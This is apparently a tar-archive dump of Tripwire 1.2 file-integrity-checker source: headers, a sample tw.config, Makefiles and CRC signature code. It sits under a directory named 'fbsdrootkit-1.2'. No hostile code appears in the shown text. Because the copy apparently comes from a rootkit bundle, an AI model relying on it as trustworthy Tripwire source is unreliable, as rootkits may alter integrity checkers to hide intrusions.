Tripwire Configuration ***/ /******* signature functions ***************************************** * * Choose among these: * * sig_md5_get : MD5 function * (the RSA Data Security, Inc. MD5 Message- * Digesting Algorithm) * sig_snefru_get : Snefru function * (the Xerox Secure Hash Function) * sig_null_get : null function (returns 0 for all) * * By default, Tripwire uses * int (pf_signature0)() = sig_null_get; * int (pf_signature1)() = sig_md5_get; * int (pf_signature2)() = sig_snefru_get; * * However, since Snefru is comparatively computationally expensive, you * might consider using only MD5. This can be done in the configuration, * however, and should not be done by defining away the signature here. * * You can replace one of the signature algorithms with another of your * own choice by adding it to the build procedure, and putting it in * here in place of one of these standard routines. See the design * document for hints on this. * * To do this, just set one of the signature function pointers to * your own function. * *********************************************************************/ #define SIG0FUNC sig_null_get #define SIG1FUNC sig_md5_get #define SIG2FUNC sig_snefru_get #define SIG3FUNC sig_crc32_get #define SIG4FUNC sig_crc_get #define SIG5FUNC sig_md4_get #define SIG6FUNC sig_md2_get #define SIG7FUNC sig_sha_get #define SIG8FUNC sig_haval_get #define SIG9FUNC sig_null_get #define SIG0NAME "nullsig" #define SIG1NAME "md5" #define SIG2NAME "snefru" #define SIG3NAME "crc32" #define SIG4NAME "crc16" #define SIG5NAME "md4" #define SIG6NAME "md2" #define SIG7NAME "sha" #define SIG8NAME "haval" #define SIG9NAME "nullsig" /******* path to Tripwire files ************************************** * * Ideally, CONFIG_PATH and DATABASE_PATH should be pointing to * some read-only media, or some filesystem mounted remotely * from a "secure-server". (See design document for details.) * * Note: No trailing '/' in the paths! * *********************************************************************/ /* #if !defined(SYSV) || (defined(SYSV) && (SYSV > 2)) # define CONFIG_PATH "/usr/adm/tcheck" # define DATABASE_PATH "/usr/adm/tcheck/databases" #else # define CONFIG_PATH "/usr/local/adm/tcheck" # define DATABASE_PATH "/usr/local/adm/tcheck/databases" #endif */ #define CONFIG_PATH "/tmp/genek" #define DATABASE_PATH "/tmp/genek" /******* name of Tripwire files ************************************** * * Static filenames are nice, but we allow run-time binding to * support multiple hosts sharing the same directory (without * having to recompile. * * Use the '@' character to represent the hostname of the machine * running Tripwire. * * For example "tw.db_@" would expand to: * * tw.db_mentor.cc.purdue.edu * *********************************************************************/ #define CONFIG_FILE "tw.config" #define DATABASE_FILE "tw.db_@" /******* Default ignore mask **************************************** * * Usually, the only thing you want to ignore is the access time * stamp. But there may be applications where you want to know * about any accesses, too. * * Similarly, there may be some environments where you can have a much * more forgiving ignore mask. * * By default, Tripwire uses: * "R" -- read-only files, where only the access time * stamp can change. * Alternatively, you might want to make the default be "R-2" * This would be faster than simply "R", at some small loss * (perhaps) of protection. * * NOTE: Users with backup programs that read through the file * system rather than the raw disk (e.g., bru and cpio) should * add a "-c" to the DEFAULTIGNORE string. Otherwise, every file * will be reported as changed after backups. * *********************************************************************/ #define DEFAULTIGNORE "R-3456789" /******* Temporary file template ************************************ * * Usually, temporary files are stored in /tmp. You may want * to use a different directory if your system does not support * the BSD "sticky" bit on directories. (i.e., only owner or root * can rename or delete files.) * * Make sure that there are at least 6 X's in the template. * Each consecutive X signifies a number that mktemp() can * fill in with a random number. * *********************************************************************/ #define TEMPFILE_TEMPLATE "/tmp/twzXXXXXX" fbsdrootkit-1.2/tripwire-1.2/include/list.h100600 764 764 3460 5611466335 16061 0ustar dfdf/* $Id: list.h,v 1.5 1994/07/15 11:02:53 gkim Exp $ */ /* #define LIST_HASHSZ 17011 */ #define LIST_HASHSZ 6007 /* a more reasonable hash size */ /* Thanks to Paul Hilchey for cleaning this up */ /* data node: these get linked into both a doubly linked list (using next and prev) and a chained hash table (using cnext) */ struct list_elem { char *varname; char *varvalue; int priority; int flag; struct list_elem *next; /* pointer to next entry on list */ struct list_elem *prev; /* pointer to prev entry on list */ struct list_elem *cnext; /* pointer to next entry on chain */ }; /* hash list: NULL pointers are used instead of list/chain sentinels */ struct list { struct list_elem *p_head; /* head of linked list */ struct list_elem *p_tail; /* tail of linked list */ struct list_elem *p_curr; /* current element for list traversal */ struct list_elem *hashtable[LIST_HASHSZ]; /* hash chains */ }; typedef struct list list; /* prototypes */ /* Do not remove this line. Protyping depends on it! */ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif /* list.c */ void list_set P_((char *pc_name, char *pc_value, int priority, struct list **pp_list)); char *list_lookup P_((char *pc_name, struct list **pp_list)); int list_isthere P_((char *pc_name, struct list **pp_list)); void list_unset P_((char *pc_name, struct list **pp_list)); int list_setflag P_((char *pc_name, int flag, struct list **pp_list)); int list_getflag P_((char *pc_name, struct list **pp_list)); void list_print P_((struct list **pp_list)); void list_reset P_((struct list **pp_list)); int list_init P_((void)); int list_open P_((struct list **pp_list)); struct list_elem *list_get P_((struct list **pp_list)); int list_close P_((struct list **pp_list)); #undef P_ fbsdrootkit-1.2/tripwire-1.2/include/patchlevel.h100600 764 764 124 5547647751 17222 0ustar dfdf/* $Id: patchlevel.h,v 1.11 1994/04/03 23:23:21 gkim Exp $ */ #define PATCHLEVEL 2 fbsdrootkit-1.2/tripwire-1.2/include/sigs.h100600 764 764 1144 5503640072 16040 0ustar dfdf/* $Id: sigs.h,v 1.3 1993/12/15 16:50:02 genek Exp $ */ /* * sigs.h * * common header definitions for signature wrappers. * * Gene Kim * Purdue University * October 12, 1992 */ #include #include #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #if (defined(SYSV) && (SYSV < 3)) # include # include #endif /* SVR2 */ #ifndef SEEK_SET # define SEEK_SET L_SET #endif char *pltob64(); extern int printhex; /* prototypes */ #ifdef __STDC__ int sig_null_get(int, char *, int); #else int sig_null_get(); #endif fbsdrootkit-1.2/tripwire-1.2/include/tripwire.h100600 764 764 20434 5614761222 16767 0ustar dfdf/* $Id: tripwire.h,v 1.32 1994/07/25 16:04:34 gkim Exp $ */ /************************************************************************ * * All files in the distribution of Tripwire are Copyright 1992, 1993 by * the Purdue Research Foundation of Purdue University. All rights * reserved. Some individual files in this distribution may be covered * by other copyrights, as noted in their embedded comments. * * Redistribution and use in source and binary forms are permitted * provided that this entire copyright notice is duplicated in all such * copies, and that any documentation, announcements, and other * materials related to such distribution and use acknowledge that the * software was developed at Purdue University, W. Lafayette, IN by * Gene Kim and Eugene Spafford. No charge, other than an "at-cost" * distribution fee, may be charged for copies, derivations, or * distributions of this material without the express written consent * of the copyright holder. Neither the name of the University nor the * names of the authors may be used to endorse or promote products * derived from this material without specific prior written * permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE * IMPLIED WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR ANY PARTICULAR * PURPOSE. * ************************************************************************/ /* * tripwire.h * * common definitions for Tripwire * * Gene Kim * Purdue University */ /* version information */ #define VERSION_NUM "1.2" #define DB_VERSION_NUM 4 /* For signature routines prototypes: */ #include "../sigs/snefru/snefru.h" #include "../sigs/md5/md5.h" #include "../sigs/crc32/crc32.h" #include "../sigs/crc/crc.h" #include "../sigs/md2/md2.h" #include "../sigs/md4/md4.h" #include "../sigs/sha/sha.h" #include "../sigs/haval/haval.h" /* essential includes common to all sources files */ #include /* get any missing inode typedefs */ #include "../include/inode.h" /* database record format */ /* filename: (entrynumber, ignorevec, st_mode, st_ino, st_nlink, * st_uid, st_gid, st_size, * ltob64(statbuf->st_atime, vec64_a), * ltob64(statbuf->st_mtime, vec64_m), * ltob64(statbuf->st_ctime, vec64_c), sig0, sig1, ..., sig9 */ # define DB_RECORD_FORMAT "%ld %s %lo %lu %lu %lu %lu %lu %s %s %s %s %s %s %s %s %s %s %s %s %s\n" #define DB_RECORD_FIELDS 21 /* system defaults */ extern int db_version_num; extern char *config_file; extern char *config_path; extern char *database_file; extern char *database_path; extern char tempdatabase_file[]; extern FILE *fptempdbase; extern int debuglevel, verbosity, quietmode, printpreprocess; extern int test_interactive; extern char *specified_dbasefile, *specified_configfile; extern int specified_configfd, specified_dbasefd; extern int specified_configmode, specified_dbasemode; extern char *progname; extern char *defaultignore; extern char *db_record_format; extern struct list *olddbase_list; extern struct list *toc_list; extern char *version_num; extern char backupfile[]; extern int printhex; extern int runtimeignore; extern int loosedir; /* debugging verbosity */ #define SPDEBUG(x) if (debuglevel >= (x)) #define TRUE 1 #define FALSE 0 #define SIG_MAX_LEN 200 /* ignore vector flags */ /* note: as an optimization, IGNORE_0 .. IGNORE_9 are ordered. * do not change the ordering of these vectors! */ #define IGNORE_P 0x1 #define IGNORE_I 0x2 #define IGNORE_N 0x4 #define IGNORE_U 0x8 #define IGNORE_G 0x10 #define IGNORE_S 0x20 #define IGNORE_A 0x40 #define IGNORE_M 0x80 #define IGNORE_C 0x100 #define IGNORE_0 0x200 #define IGNORE_1 0x400 #define IGNORE_2 0x800 #define IGNORE_3 0x1000 #define IGNORE_4 0x2000 #define IGNORE_5 0x4000 #define IGNORE_6 0x8000 #define IGNORE_7 0x10000 #define IGNORE_8 0x20000 #define IGNORE_9 0x40000 #define IGNORE_0_9 (IGNORE_0|IGNORE_1|IGNORE_2|IGNORE_3|IGNORE_4|IGNORE_5|IGNORE_6|IGNORE_7|IGNORE_8|IGNORE_9) #define IGNORE_GROW 0x80000 /* growing log files */ /* filelist flags */ #define FLAG_CHANGED 1 #define FLAG_NOOPEN 2 #define FLAG_SYMLINK 4 #define FLAG_SEEN 8 #define FLAG_UPDATE 16 #define FLAG_UNCHANGE 32 #define FLAG_DELETE 64 /* prunelist flags */ #define PRUNE_ALL 1 #define PRUNE_ONE 2 /* database_build() modes */ #define DBASE_PERMANENT 0 #define DBASE_TEMPORARY 1 #define DBASE_UPDATE 2 /* database update modes */ #define UPDATE_INVALID 0 #define UPDATE_ADDFILE 1 #define UPDATE_DELETEFILE 2 #define UPDATE_UPDATEFILE 3 #define UPDATE_NOTFOUND 4 #define UPDATE_ADDENTRY 5 #define UPDATE_DELETEENTRY 6 #define UPDATE_UPDATEENTRY 7 /* define specified file modes */ #define SPECIFIED_NONE 0 #define SPECIFIED_FILE 1 #define SPECIFIED_FD 2 /* diff lists */ extern struct list *diff_added_list, *diff_deleted_list, *diff_changed_list; extern int diff_added_num, diff_changed_num, diff_deleted_num, diff_unignored_num; extern int files_scanned_num; /* diff parsing */ struct diff_bucket { int arg1, arg2, arg3, arg4; int diffmode; }; /* diff_parsing() types */ #define DIFF_SAME 0 #define DIFF_CHANGED 1 #define DIFF_ADDED 2 #define DIFF_DELETED 3 /* signature functions */ #define NUM_SIGS 10 extern int (*pf_signatures[NUM_SIGS]) (); extern char *signames[NUM_SIGS]; /* prototypes */ /*** Do not remove this line. Protyping depends on it! ***/ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif /* config.parse.c */ void configfile_read P_((struct list **pp_list, struct list **pp_entry_list)); /* main.c */ int main P_((int argc, char *argv[])); /* list.c */ void list_set P_((char *pc_name, char *pc_value, int priority, struct list **pp_list)); char *list_lookup P_((char *pc_name, struct list **pp_list)); int list_isthere P_((char *pc_name, struct list **pp_list)); void list_unset P_((char *pc_name, struct list **pp_list)); int list_setflag P_((char *pc_name, int flag, struct list **pp_list)); int list_getflag P_((char *pc_name, struct list **pp_list)); void list_print P_((struct list **pp_list)); void list_reset P_((struct list **pp_list)); int list_init P_((void)); int list_open P_((struct list **pp_list)); struct list_elem *list_get P_((struct list **pp_list)); int list_close P_((struct list **pp_list)); /* ignorevec.c */ int ignore_vec_to_scalar P_((char *s)); void ignore_configvec_to_dvec P_((char *s)); /* dbase.build.c */ void database_build P_((struct list **pp_list, int mode, struct list **pp_entry_list)); /* utils.c */ void warn_with_err P_((char *format, char *name)); void die_with_err P_((char *format, char *name)); void filename_hostname_expand P_((char **ps)); int slash_count P_((char *pathname)); int string_split_space P_((char *string, char *s, char *t)); int string_split_ch P_((char *string, char *s, char *t, int ch)); void chop P_((char *s)); void filename_escape_expand P_((char *filename)); char *filename_escape P_((char *filename)); char *pltob64 P_((uint32 *pl, char *pcout, int numlongs)); char *btob64 P_((register unsigned char *pcbitvec, register char *pcout, int numbits)); int32 b64tol P_((char *vec)); int32 oldb64tol P_((char *vec)); void direntry_print P_((char *name, struct stat statbuf, int mode)); int fd_tempfilename_generate P_((void)); int fd_copy_to_tmp P_((int fdin)); int file_copy_to_tmp P_((char *filename)); int file_to_fd P_((char *filename)); /* preen.c */ void update_gather P_((int interactive, char ***ppp_updateentries)); void update_mark P_((char **ppentry, int num)); void dbase_entry_howclose P_((char *filename, struct list **ppentrylist, char *pentryname, int *pentrynum)); /* preen.interp.c */ void preen_interp P_((FILE *fpin)); /* preen.report.c */ void preen_report P_((int interactive, char ***ppp_updateentries)); /* nullsig.c */ int sig_null_get P_((int fd_in, char *ps_signature, int siglen)); /* config.prim.c */ void tw_mac_define P_((char *varname, char *varvalue)); char *tw_mac_dereference P_((char *varname)); void tw_mac_undef P_((char *varname)); int tw_mac_ifdef P_((char *varname)); int tw_mac_ifhost P_((char *hostname)); /* dbase.update.c */ void dbase_entry_flag P_((struct list **pp_list, int flagentry, int orflag, char *ignore)); /* config.pre.c */ void tw_macro_parse P_((char *filename, FILE *fpin, FILE *fpout, struct list **pp_entry_list)); /* help.c */ void tw_help_print P_((FILE *fpout)); fbsdrootkit-1.2/tripwire-1.2/lib/ 40700 764 764 0 5630552014 13745 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/lib/tw.config100600 764 764 10210 5474057116 15710 0ustar dfdf# $Id: tw.config,v 1.4 1993/11/22 06:38:06 genek Exp $ # # tw.config # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tw.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # > : like [L], but ignore growing files # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # ==== # # Preprocessor directives: # # The following directives provide C-preprocessor and m4-like # functionality: # # @@ifhost hostname : included if (hostname) matches # @@ifhost hostname : included if (hostname) doesn't # match. # (both need matching @@endif) # # @@define x : defines (x) # @@undef x : undefines (x) # # @@ifdef x : included if (x) is defined. # @@ifndef x : included if (x) is not defined. # (both need matching @@endif) # # @@endif : closes up @@ifhost, @@ifdef, # and @@ifndef. # # Example: # A host-dependent inclusion can be specified many ways so tw.config # files can be shared among multiple machines. So, if the machine # "mentor.cc.purdue.edu" is the only machine that has a certain file, # you could use: # # @@ifhost mentor.cc.purdue.edu # /etc/tw.log.mentor R # @@endif # /tmp/genek/tripwire-1.0 R+0123456789-ugpmci /tmp/genek/tripwire-1.0/tests E /tmp/genek/tripwire-1.0/tw.config E /tmp/genek/tripwire-1.0/databases E /tmp/genek/tripwire-1.0/src/config.parse.o /tmp/genek/tripwire-1.0/src/main.o /tmp/genek/tripwire-1.0/src/list.o /tmp/genek/tripwire-1.0/src/ignorevec.o /tmp/genek/tripwire-1.0/src/dbase.build.o /tmp/genek/tripwire-1.0/src/utils.o /tmp/genek/tripwire-1.0/src/preen.o /tmp/genek/tripwire-1.0/src/preen.interp.o /tmp/genek/tripwire-1.0/src/preen.report.o /tmp/genek/tripwire-1.0/src/nullsig.o /tmp/genek/tripwire-1.0/src/config.prim.o /tmp/genek/tripwire-1.0/src/dbase.update.o /tmp/genek/tripwire-1.0/src/sigfetch.o /tmp/genek/tripwire-1.0/src/config.pre.o /tmp/genek/tripwire-1.0/sigs/crc/crc.o /tmp/genek/tripwire-1.0/sigs/crc32/crc32.o /tmp/genek/tripwire-1.0/sigs/md2/md2wrapper.o /tmp/genek/tripwire-1.0/sigs/md2/md2.o /tmp/genek/tripwire-1.0/sigs/md4/md4.o /tmp/genek/tripwire-1.0/sigs/md4/md4wrapper.o /tmp/genek/tripwire-1.0/sigs/md5/md5.o /tmp/genek/tripwire-1.0/sigs/md5/md5wrapper.o /tmp/genek/tripwire-1.0/sigs/snefru/snefru.o !/tmp/genek/tripwire-1.0/aux/types !/tmp/genek/tripwire-1.0/aux/byteorder !/tmp/genek/tripwire-1.0/src/config.lex.c !/tmp/genek/tripwire-1.0/src/config.pre.c !/tmp/genek/tripwire-1.0/Makefile !/tmp/genek/tripwire-1.0/include/config.h !/tmp/genek/tripwire-1.0/include/byteorder.h !/tmp/genek/tripwire-1.0/include/inode.h fbsdrootkit-1.2/tripwire-1.2/sigs/ 40700 764 764 0 5630552015 14145 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/crc/ 40700 764 764 0 5630552015 14714 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/crc/Makefile100600 764 764 362 5474057122 16441 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:10 genek Exp $ # # Makefile for crc32 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: crc.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure crc.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/crc/crc.c100600 764 764 14717 5614757123 15771 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: crc.c,v 1.6 1994/07/25 15:46:27 gkim Exp $"; #endif /* * crc.c * * signature function hook for CRC-16. * * Gene Kim * Purdue University * October 14, 1992 */ /* ============================================================= */ /* COPYRIGHT (C) 1986 Gary S. Brown. You may use this program, or */ /* code or tables extracted from it, as desired without restriction. */ /* */ /* First, the polynomial itself and its table of feedback terms. The */ /* polynomial is */ /* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0 */ /* */ /* Note that we take it "backwards" and put the highest-order term in */ /* the lowest-order bit. The X^32 term is "implied"; the LSB is the */ /* X^31 term, etc. The X^0 term (usually shown as "+1") results in */ /* the MSB being 1. */ /* */ /* Note that the usual hardware shift register implementation, which */ /* is what we're using (we're merely optimizing it by doing eight-bit */ /* chunks at a time) shifts bits into the lowest-order term. In our */ /* implementation, that means shifting towards the right. Why do we */ /* do it this way? Because the calculated CRC must be transmitted in */ /* order from highest-order term to lowest-order term. UARTs transmit */ /* characters in order from LSB to MSB. By storing the CRC this way, */ /* we hand it to the UART in the order low-byte to high-byte; the UART */ /* sends each low-bit to hight-bit; and the result is transmission bit */ /* by bit from highest- to lowest-order term without requiring any bit */ /* shuffling on our part. Reception works similarly. */ /* */ /* The feedback terms table consists of 256, 32-bit entries. Notes: */ /* */ /* The table can be generated at runtime if desired; code to do so */ /* is shown later. It might not be obvious, but the feedback */ /* terms simply represent the results of eight shift/xor opera- */ /* tions for all combinations of data and CRC register values. */ /* */ /* The values must be right-shifted by eight bits by the "updcrc" */ /* logic; the shift must be unsigned (bring in zeroes). On some */ /* hardware you could probably optimize the shift in assembler by */ /* using byte-swap instructions. */ /* polynomial $edb88320 */ /* */ /* -------------------------------------------------------------------- */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #include "../../include/sigs.h" #define BUFSIZE 4096 static unsigned int crc16; static unsigned int crc16tab[256] = { 0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240, 0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441, 0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40, 0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040 }; static void UpdateCRC16(buffer, bufsize) unsigned char *buffer; int bufsize; { register unsigned int i, tmp; for (i = 0; i < bufsize; i++) { tmp = crc16 ^ buffer[i]; crc16 = (crc16 >> 8) ^ crc16tab[tmp & 0xff]; /* crc16 = (crc16 >> 8) ^ crc16tab[((crc16 ^ buffer[i]) & 0xff)]; */ } } int sig_crc_get(fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { unsigned char buffer[BUFSIZE]; int readin = -1; int scratch[100]; if (lseek(fd_in, 0, SEEK_SET) < 0) { perror("sig_crc_get: lseek()"); exit(1); } crc16 = 0; while ((readin = read(fd_in, (char *)buffer, (off_t) BUFSIZE)) == BUFSIZE) { UpdateCRC16(buffer, BUFSIZE); } if (readin != 0) { UpdateCRC16(buffer, readin); } if (printhex) sprintf(ps_signature, "%04lx", (crc16 &0xFFFF)); else { uint32 l = (uint32)(crc16 & 0xFFFF); sprintf(ps_signature, "%s", pltob64(&l, (char *)scratch, 1)); } return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/crc/crc.h100600 764 764 113 5434607520 15712 0ustar dfdf/* $Id: crc.h,v 1.2 1993/08/19 05:27:44 genek Exp $ */ int sig_crc_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/crc32/ 40700 764 764 0 5630552015 15061 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/crc32/Makefile100600 764 764 365 5502764526 16616 0ustar dfdf# $Id: Makefile,v 1.4 1993/12/13 04:02:30 genek Exp $ # # Makefile for crc32 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: crc32.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -f *.o .pure crc32.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/crc32/crc32.c100600 764 764 15506 5614757125 16302 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: crc32.c,v 1.10 1994/07/25 15:46:29 gkim Exp $"; #endif /*- * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * James W. Williams of NASA Goddard Space Flight Center. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * crc32.c * * signature function hook for CRC32. * * Gene Kim * Purdue University * August 31, 1993 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #include "../../include/sigs.h" #include "crc32.h" #define BUFSIZE 4096 static uint32 crctab[] = { 0x0, 0x04c11db7, 0x09823b6e, 0x0d4326d9, 0x130476dc, 0x17c56b6b, 0x1a864db2, 0x1e475005, 0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61, 0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd, 0x4c11db70, 0x48d0c6c7, 0x4593e01e, 0x4152fda9, 0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75, 0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011, 0x791d4014, 0x7ddc5da3, 0x709f7b7a, 0x745e66cd, 0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039, 0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5, 0xbe2b5b58, 0xbaea46ef, 0xb7a96036, 0xb3687d81, 0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d, 0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49, 0xc7361b4c, 0xc3f706fb, 0xceb42022, 0xca753d95, 0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1, 0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d, 0x34867077, 0x30476dc0, 0x3d044b19, 0x39c556ae, 0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072, 0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16, 0x018aeb13, 0x054bf6a4, 0x0808d07d, 0x0cc9cdca, 0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde, 0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02, 0x5e9f46bf, 0x5a5e5b08, 0x571d7dd1, 0x53dc6066, 0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba, 0xaca5c697, 0xa864db20, 0xa527fdf9, 0xa1e6e04e, 0xbfa1b04b, 0xbb60adfc, 0xb6238b25, 0xb2e29692, 0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6, 0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a, 0xe0b41de7, 0xe4750050, 0xe9362689, 0xedf73b3e, 0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2, 0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686, 0xd5b88683, 0xd1799b34, 0xdc3abded, 0xd8fba05a, 0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637, 0x7a089632, 